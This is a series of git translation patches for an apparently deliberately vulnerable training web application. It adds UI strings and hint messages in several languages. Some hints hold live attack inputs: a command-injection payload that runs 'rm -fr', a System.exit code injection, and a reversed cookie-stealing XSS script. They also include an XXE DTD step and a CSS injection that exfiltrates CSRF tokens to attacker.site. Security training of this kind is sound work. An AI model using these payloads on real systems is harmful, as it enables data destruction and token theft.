msg.reverse.color.complete=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u304c\u5b8c\u4e86\u3057\u307e\u3057\u305f\u3002 msg.reverse.color.fail=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 -msg.select.year=Please select an year. +msg.select.log.level=Please select a log level of the console logger which is used only in this feature. msg.select.upload.file=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3057\u3066\u4e0b\u3055\u3044\u3002 +msg.select.year=Please select an year. msg.sent.mail=\u30e1\u30fc\u30eb\u304c\u6b63\u5e38\u306b\u9001\u4fe1\u3055\u308c\u307e\u3057\u305f\u3002 msg.unknown.exception.occur=\u4f55\u3089\u304b\u306e\u4f8b\u5916\u304c\u767a\u751f\u3057\u307e\u3057\u305f \: {0} msg.update.records={0}\u4ef6\u66f4\u65b0\u3057\u307e\u3057\u305f\u3002 @@ -352,6 +357,7 @@ title.unrestrictedextupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b title.unrestrictedsizeupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2 title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect +title.weakreference.page=Console Logger Test title.xee.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b\u9332 title.xss.page=\u6587\u5b57\u5217\u306e\u9006\u8ee2 title.xxe.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0 From 160600c0b998e49e1958fd67d6403a6ae7220afb Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 22:37:35 +0900 Subject: [PATCH 129/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index e270424..e4296dc 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -63,6 +63,7 @@ function.description.unrestricted.ext.upload=This page is vulnerable for attacks function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +function.description.weak.reference=This page uses a weakly referenced object, so the behavior changes after being collected by the GC. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -109,6 +110,7 @@ function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation +function.name.weak.reference=Using Weak Reference Object function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -122,6 +124,7 @@ label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String +label.change=Change label.character.count=Character Count label.code=Code label.content=Content @@ -266,6 +269,7 @@ msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +msg.note.weakreference=If you repeatedly load this page, the log level will be restored to the default INFO. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -279,8 +283,9 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. -msg.select.year=Please select an year. +msg.select.log.level=Please select a log level of the console logger which is used only in this feature. msg.select.upload.file=Select a file to upload. +msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. @@ -352,6 +357,7 @@ title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect +title.weakreference.page=Console Logger Test title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From fc24aba68560bb78bfc04bbbf1008f0ce4fadc7b Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 22:37:38 +0900 Subject: [PATCH 130/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index e270424..e4296dc 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -63,6 +63,7 @@ function.description.unrestricted.ext.upload=This page is vulnerable for attacks function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +function.description.weak.reference=This page uses a weakly referenced object, so the behavior changes after being collected by the GC. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -109,6 +110,7 @@ function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation +function.name.weak.reference=Using Weak Reference Object function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -122,6 +124,7 @@ label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String +label.change=Change label.character.count=Character Count label.code=Code label.content=Content @@ -266,6 +269,7 @@ msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +msg.note.weakreference=If you repeatedly load this page, the log level will be restored to the default INFO. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -279,8 +283,9 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. -msg.select.year=Please select an year. +msg.select.log.level=Please select a log level of the console logger which is used only in this feature. msg.select.upload.file=Select a file to upload. +msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. @@ -352,6 +357,7 @@ title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect +title.weakreference.page=Console Logger Test title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 03a08619bb9b6dd0e85e3bb01e3cefc4598f112c Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 22:37:41 +0900 Subject: [PATCH 131/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index e270424..e4296dc 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -63,6 +63,7 @@ function.description.unrestricted.ext.upload=This page is vulnerable for attacks function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +function.description.weak.reference=This page uses a weakly referenced object, so the behavior changes after being collected by the GC. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -109,6 +110,7 @@ function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation +function.name.weak.reference=Using Weak Reference Object function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -122,6 +124,7 @@ label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String +label.change=Change label.character.count=Character Count label.code=Code label.content=Content @@ -266,6 +269,7 @@ msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +msg.note.weakreference=If you repeatedly load this page, the log level will be restored to the default INFO. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -279,8 +283,9 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. -msg.select.year=Please select an year. +msg.select.log.level=Please select a log level of the console logger which is used only in this feature. msg.select.upload.file=Select a file to upload. +msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. @@ -352,6 +357,7 @@ title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect +title.weakreference.page=Console Logger Test title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 0ee3a4f7eee1ec5fdef7127bfda1f3744dd18415 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 30 Oct 2019 16:33:57 +0900 Subject: [PATCH 132/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index e4296dc..094a949 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -22,6 +22,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.cssinjection=There is a CSS injection vulnerability in this page. function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. @@ -71,6 +72,7 @@ function.name.brute.force=Login page that allows brute-force attacks function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.cssinjection=CSS Injection function.name.dangerous.file.inclusion=Dangerous File Inclusion function.name.database.connection.leak=Database Connection Leak function.name.dead.lock=Deadlock (Java) @@ -129,6 +131,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.default=Default label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page @@ -155,6 +158,7 @@ label.metaspace=Metaspace label.name=Name label.numbers=Numbers label.obelus=/ +label.original.style=Original Style label.password=Password label.permgen.space=PermGen space label.phone=Phone @@ -236,6 +240,7 @@ msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);//@Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. +msg.note.cssinjection=If you deploy the following CSS file at http\://attacker.site/cssinjection.css and add style\=%40import%20url(%22http%3A%2F%2Fattacker.site%2Fcssinjection.css%22)%3B is added to the query string, then the first character of hidden CSRF token will be sent to http\://attacker.site/. If you also deploy an application that executes this recursively on http\://attacker.site/, then you can get the whole CSRF token. The reproducibility of this issue depends on the browser which you use. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. @@ -284,6 +289,7 @@ msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.log.level=Please select a log level of the console logger which is used only in this feature. +msg.select.or.enter.style=Please select or enter a style (CSS) to apply to this page. msg.select.upload.file=Select a file to upload. msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. @@ -324,6 +330,7 @@ title.codeinjection.page=Parse JSON title.commandinjection.page=Performing Basic Numeric Operations title.createobjects.page=Sum of natural numbers title.csrf.page=Change Your Password +title.cssinjection.page=Change Style title.current.date=Display Current Date title.current.time=Display Current Time title.dbconnectionleak.page=User List From dd00474883758429de03fa2db22b800de1fee525 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 30 Oct 2019 16:33:59 +0900 Subject: [PATCH 133/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index e4296dc..094a949 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -22,6 +22,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.cssinjection=There is a CSS injection vulnerability in this page. function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. @@ -71,6 +72,7 @@ function.name.brute.force=Login page that allows brute-force attacks function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.cssinjection=CSS Injection function.name.dangerous.file.inclusion=Dangerous File Inclusion function.name.database.connection.leak=Database Connection Leak function.name.dead.lock=Deadlock (Java) @@ -129,6 +131,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.default=Default label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page @@ -155,6 +158,7 @@ label.metaspace=Metaspace label.name=Name label.numbers=Numbers label.obelus=/ +label.original.style=Original Style label.password=Password label.permgen.space=PermGen space label.phone=Phone @@ -236,6 +240,7 @@ msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);//@Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. +msg.note.cssinjection=If you deploy the following CSS file at http\://attacker.site/cssinjection.css and add style\=%40import%20url(%22http%3A%2F%2Fattacker.site%2Fcssinjection.css%22)%3B is added to the query string, then the first character of hidden CSRF token will be sent to http\://attacker.site/. If you also deploy an application that executes this recursively on http\://attacker.site/, then you can get the whole CSRF token. The reproducibility of this issue depends on the browser which you use. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. @@ -284,6 +289,7 @@ msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.log.level=Please select a log level of the console logger which is used only in this feature. +msg.select.or.enter.style=Please select or enter a style (CSS) to apply to this page. msg.select.upload.file=Select a file to upload. msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. @@ -324,6 +330,7 @@ title.codeinjection.page=Parse JSON title.commandinjection.page=Performing Basic Numeric Operations title.createobjects.page=Sum of natural numbers title.csrf.page=Change Your Password +title.cssinjection.page=Change Style title.current.date=Display Current Date title.current.time=Display Current Time title.dbconnectionleak.page=User List From aaa001d43fc6651d21da1d52fa41d900af79ee12 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 30 Oct 2019 16:34:01 +0900 Subject: [PATCH 134/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index e4296dc..094a949 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -22,6 +22,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.cssinjection=There is a CSS injection vulnerability in this page. function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. @@ -71,6 +72,7 @@ function.name.brute.force=Login page that allows brute-force attacks function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.cssinjection=CSS Injection function.name.dangerous.file.inclusion=Dangerous File Inclusion function.name.database.connection.leak=Database Connection Leak function.name.dead.lock=Deadlock (Java) @@ -129,6 +131,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.default=Default label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page @@ -155,6 +158,7 @@ label.metaspace=Metaspace label.name=Name label.numbers=Numbers label.obelus=/ +label.original.style=Original Style label.password=Password label.permgen.space=PermGen space label.phone=Phone @@ -236,6 +240,7 @@ msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);//@Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. +msg.note.cssinjection=If you deploy the following CSS file at http\://attacker.site/cssinjection.css and add style\=%40import%20url(%22http%3A%2F%2Fattacker.site%2Fcssinjection.css%22)%3B is added to the query string, then the first character of hidden CSRF token will be sent to http\://attacker.site/. If you also deploy an application that executes this recursively on http\://attacker.site/, then you can get the whole CSRF token. The reproducibility of this issue depends on the browser which you use. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. @@ -284,6 +289,7 @@ msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.log.level=Please select a log level of the console logger which is used only in this feature. +msg.select.or.enter.style=Please select or enter a style (CSS) to apply to this page. msg.select.upload.file=Select a file to upload. msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. @@ -324,6 +330,7 @@ title.codeinjection.page=Parse JSON title.commandinjection.page=Performing Basic Numeric Operations title.createobjects.page=Sum of natural numbers title.csrf.page=Change Your Password +title.cssinjection.page=Change Style title.current.date=Display Current Date title.current.time=Display Current Time title.dbconnectionleak.page=User List From 903cb264fe8409694f28734b7af59eb5330864ae Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 30 Oct 2019 16:34:03 +0900 Subject: [PATCH 135/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index e4296dc..094a949 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -22,6 +22,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.cssinjection=There is a CSS injection vulnerability in this page. function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. @@ -71,6 +72,7 @@ function.name.brute.force=Login page that allows brute-force attacks function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.cssinjection=CSS Injection function.name.dangerous.file.inclusion=Dangerous File Inclusion function.name.database.connection.leak=Database Connection Leak function.name.dead.lock=Deadlock (Java) @@ -129,6 +131,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.default=Default label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page @@ -155,6 +158,7 @@ label.metaspace=Metaspace label.name=Name label.numbers=Numbers label.obelus=/ +label.original.style=Original Style label.password=Password label.permgen.space=PermGen space label.phone=Phone @@ -236,6 +240,7 @@ msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);//@Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. +msg.note.cssinjection=If you deploy the following CSS file at http\://attacker.site/cssinjection.css and add style\=%40import%20url(%22http%3A%2F%2Fattacker.site%2Fcssinjection.css%22)%3B is added to the query string, then the first character of hidden CSRF token will be sent to http\://attacker.site/. If you also deploy an application that executes this recursively on http\://attacker.site/, then you can get the whole CSRF token. The reproducibility of this issue depends on the browser which you use. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. @@ -284,6 +289,7 @@ msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.log.level=Please select a log level of the console logger which is used only in this feature. +msg.select.or.enter.style=Please select or enter a style (CSS) to apply to this page. msg.select.upload.file=Select a file to upload. msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. @@ -324,6 +330,7 @@ title.codeinjection.page=Parse JSON title.commandinjection.page=Performing Basic Numeric Operations title.createobjects.page=Sum of natural numbers title.csrf.page=Change Your Password +title.cssinjection.page=Change Style title.current.date=Display Current Date title.current.time=Display Current Time title.dbconnectionleak.page=User List From 7b8db55bd994fce82996ae187edf46eef899477b Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 30 Oct 2019 16:34:05 +0900 Subject: [PATCH 136/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 00e32d1..3507b8a 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -22,6 +22,7 @@ function.description.brute.force=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30f function.description.clickjacking=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u5909\u66f4\u30da\u30fc\u30b8\u306b\u306f\u30af\u30ea\u30c3\u30af\u30b8\u30e3\u30c3\u30ad\u30f3\u30b0\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.code.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.csrf=\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4\u30da\u30fc\u30b8\u306b\u306fCSRF\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.cssinjection=There is a CSS injection vulnerability in this page. function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 function.description.dead.lock=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af(Java)\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 @@ -71,6 +72,7 @@ function.name.brute.force=\u30d6\u30eb\u30fc\u30c8\u30d5\u30a9\u30fc\u30b9\u653b function.name.clickjacking=\u30af\u30ea\u30c3\u30af\u30b8\u30e3\u30c3\u30ad\u30f3\u30b0 function.name.code.injection=\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 function.name.csrf=CSRF (\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30ea\u30af\u30a8\u30b9\u30c8\u30d5\u30a9\u30fc\u30b8\u30a7\u30ea) +function.name.cssinjection=CSS Injection function.name.dangerous.file.inclusion=\u5371\u967a\u306a\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9 function.name.database.connection.leak=\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af function.name.dead.lock=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af (Java) @@ -129,6 +131,7 @@ label.character.count=\u6587\u5b57\u6570 label.code=\u30b3\u30fc\u30c9 label.content=\u672c\u6587 label.current.thread.count=\u73fe\u5728\u306e\u30b9\u30ec\u30c3\u30c9\u6570 +label.default=Default label.determine=Determine label.execution.result=\u5b9f\u884c\u7d50\u679c\: label.go.to.main=\u30e1\u30a4\u30f3\u30da\u30fc\u30b8\u3078 @@ -155,6 +158,7 @@ label.metaspace=Metaspace label.name=\u540d\u524d label.numbers=\u6570\u5b57 label.obelus=\u00f7 +label.original.style=Original Style label.password=\u30d1\u30b9\u30ef\u30fc\u30c9 label.permgen.space=PermGen\u9818\u57df label.phone=\u96fb\u8a71\u756a\u53f7 @@ -236,6 +240,7 @@ msg.note.codeinjection={}');java.lang.System.exit(0);//\u3092\u5165 msg.note.commandinjection=@Runtime@getRuntime().exec('rm -fr /your-important-dir/')\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u91cd\u8981\u306a\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u304c\u524a\u9664\u3055\u308c\u307e\u3059\u3002 msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=\u3053\u306e\u30da\u30fc\u30b8\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u610f\u56f3\u3057\u306a\u3044\u30ea\u30af\u30a8\u30b9\u30c8\u3082\u53d7\u4fe1\u3057\u3066\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5909\u66f4\u3057\u3066\u3057\u307e\u3044\u307e\u3059\u3002 +msg.note.cssinjection=If you deploy the following CSS file at http\://attacker.site/cssinjection.css and add style\=%40import%20url(%22http%3A%2F%2Fattacker.site%2Fcssinjection.css%22)%3B is added to the query string, then the first character of hidden CSRF token will be sent to http\://attacker.site/. If you also deploy an application that executes this recursively on http\://attacker.site/, then you can get the whole CSRF token. The reproducibility of this issue depends on the browser which you use. 